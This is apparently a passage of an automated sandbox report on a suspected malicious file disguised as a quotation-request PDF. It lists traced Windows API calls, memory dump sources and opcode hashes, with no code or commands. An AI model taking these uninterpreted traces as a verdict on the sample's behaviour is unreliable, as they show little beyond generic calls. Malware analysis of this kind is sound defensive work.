                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Copy$ClearErrorLast
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 2487901850-572801152
                                                                    • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                    • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                    • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                    • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Enable$Show$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 1871949834-0
                                                                    • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                    • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                    • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                    • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    APIs
                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                    • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                    • SendMessageW.USER32 ref: 00471AE3
                                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                                    Similarity
                                                                    • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                    • String ID:
                                                                    • API String ID: 3611059338-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                                    • String ID:
                                                                    • API String ID: 1640429340-0
                                                                    APIs
                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                    • _wcslen.LIBCMT ref: 004438CD
                                                                    • _wcslen.LIBCMT ref: 004438E6
                                                                    • _wcstok.LIBCMT ref: 004438F8
                                                                    • _wcslen.LIBCMT ref: 0044390C
                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                    • _wcstok.LIBCMT ref: 00443931
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 3632110297-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                    • String ID:
                                                                    • API String ID: 752480666-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                    • String ID:
                                                                    • API String ID: 3275902921-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                    • String ID:
                                                                    • API String ID: 3275902921-0
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    APIs
                                                                    • SendMessageW.USER32 ref: 004555C7
                                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                    Similarity
                                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                    • String ID:
                                                                    • API String ID: 3691411573-0
                                                                    APIs
                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                    • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                    • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                    • EndPath.GDI32(?), ref: 004472D6
                                                                    • StrokePath.GDI32(?), ref: 004472E4
                                                                    Similarity
                                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                    • String ID:
                                                                    • API String ID: 372113273-0
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0044CC6D
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                    • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                    • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                    • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 0041708E
                                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                    • __amsg_exit.LIBCMT ref: 004170AE
                                                                    • __lock.LIBCMT ref: 004170BE
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                    • _free.LIBCMT ref: 004170EE
                                                                    • InterlockedIncrement.KERNEL32(033917F0), ref: 00417106
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                    • String ID:
                                                                    • API String ID: 3470314060-0
                                                                    • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                    • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                    • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                    • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                      • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                    • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                    • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                    • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                    • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                    • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                    • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                    APIs
                                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                                    • __freefls@4.LIBCMT ref: 00415209
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                    • String ID:
                                                                    • API String ID: 442100245-0
                                                                    • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                    • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                    • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                    • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                    APIs
                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                    • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                    • _wcslen.LIBCMT ref: 0045F94A
                                                                    • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                    • String ID: 0
                                                                    • API String ID: 621800784-4108050209
                                                                    • Opcode ID: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                                                    • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                    • Opcode Fuzzy Hash: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                                                    • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • SetErrorMode.KERNEL32 ref: 004781CE
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                    • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                    • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                    • String ID: \VH
                                                                    • API String ID: 3884216118-234962358
                                                                    • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                    • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                    • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                    • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                    • IsMenu.USER32(?), ref: 0044854D
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                    • DrawMenuBar.USER32 ref: 004485AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                    • String ID: 0
                                                                    • API String ID: 3076010158-4108050209
                                                                    • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                    • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                    • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                    • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                    • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_memmove_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1589278365-1403004172
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 0044337D
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
